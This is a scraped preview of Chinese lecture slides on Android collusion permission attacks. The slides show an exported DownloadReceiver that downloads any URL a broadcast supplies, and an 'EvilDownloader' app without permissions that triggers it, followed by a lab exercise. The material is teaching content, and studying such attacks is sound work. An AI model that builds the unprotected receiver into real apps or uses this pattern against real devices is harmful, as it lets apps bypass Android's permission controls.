- 1、本文档共22页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
;串谋权限攻击
Android程序中资源访问涉及
使用Framework提供功能
经过系统提供权限机制进行控制
2. 访问其他程序组件
其他组件自定义权限控制
正常情况下,没有申明特定访问权限,就无法访问这些资源;串谋权限攻击
但经过其他程序中可访问Android组件,就有可能突破这种访问控制,从而提升程序本身权限,这种权限提升攻击方式称为串谋权限攻击。
串谋权限攻击原理如图7.1所示: ;串谋权限攻击实例
在下载管理程序中DownloadManager中输入要下载文件URL,点击载按钮能够下载文件并保存到SD卡上
DownloadManager有下载文件与保存到SD卡上权限
DownloadManagerAndroidManifest.xml声明如下: uses-permission android: name=“android.permis sion.WRITE_EXTERNAL_STORAGE”/
uses-permission android: name=“android. permission.INTERNET”/;串谋权限攻击实例
下载文件功能是经过接受下载祈求广播,在下载广??接受者中完毕
广播接受者在AndroidManifest.xml中申明如下:
receiver android: name=”. DownloadReceiver”
intent- filter
action android: name=”com.droider.download /action
/intent- filter
/receiver;串谋权限攻击实例
DownloadReceiver响应action为“com.droider.download”广播,然后按Intent指定URL下载文件,响应广播代码如下:
public void onReceive (Context context, Intent intent) {
if(intent. getAction().equals(”com. droider. download‘’)) {
String url=intent. getExtras().getString(”url”);
String fileName=intent. getExtras().getString(”filename”);
Toast. makeText( context, url, Toast. LENGTH_SHORT). show();
try{
downloadFile (url, fileName); //下载文件;下载文件名由url字符串传过来,保存
// 文件名经过filename传递过来
} catch (IOException e) {
e.printStackTrace();
}
}
};串谋权限攻击实例
攻击程序EvilDownloader,无任何权限,只需发送文件下载祈求广播
btn1. setOnClickListener( new OnClickListener() {
@Override
public void onClick(View v) {
Intent intent=new Intent(); //创建Intent对象
intent. setAction(”com. droider. download”);
intent. putExtra(“url”,“http://developer. android. com/images/home/android-jellybean. png”);
//要下载文件URL;串谋权限攻击实例
String fileName=“jb.png”; //保存文件名
intent. putExtra(“filename”, fileName) ;
sendBroadcast(intent); //发送广播
}
});
EviIDownloader实例下载文件按钮被点击后,执行以上代码
DownloadReceiver收到广播后开始下载文件,完毕串谋攻击;试验7.1 串谋权限攻击
试验:
1、安装运营DownloadReceiver和EvilDownloader
2、实现串谋攻击
注意:将要下载文件改成本机
您可能关注的文档
- 传染病学细菌感染性腹泻课件.pptx
- 传染病医院乙肝知识科普讲座课件.pptx
- 传染病孕产妇的管理与乙肝母婴阻断.pptx
- 传统药和现代药的发展.pptx
- 串行口计算机原理与应用.pptx
- 创伤的分级救治.pptx
- 创伤评估与急救.pptx
- 创新药研发的流程.pptx
- 创新药研发流程.pptx
- 春节长假收心调整如何应对节后综合症.pptx
- 国开景区管理作业2试题及答案.pdf
- 国开景区管理作业1-4试题及答案.pdf
- 河南开放大学本科《地域文化(本)》作业练习1-3试题及答案.pdf
- 2024年大型游乐设施操作证考试题库及答案很全.pdf
- 2024年门座式起重机司机考试题库及答案.pdf
- 2022-2023学年河北省衡水市武强中学高二(下)期末数学试卷【答案版】.docx
- 2022-2023学年河北省保定市崇德实验中学高二(下)期末数学试卷【答案版】.docx
- 江西省2017年中小学教师招聘考试高中化学试卷及答案.docx
- 2024年河北省八年级中考生物真题(解析版).docx
- 2024年南阳市社会保险中心(唐河县企业养老保险分中心)(参公)一级科员招录1人《行政职业能力测验》高频考点、难点(答案详解版).docx
文档评论(0)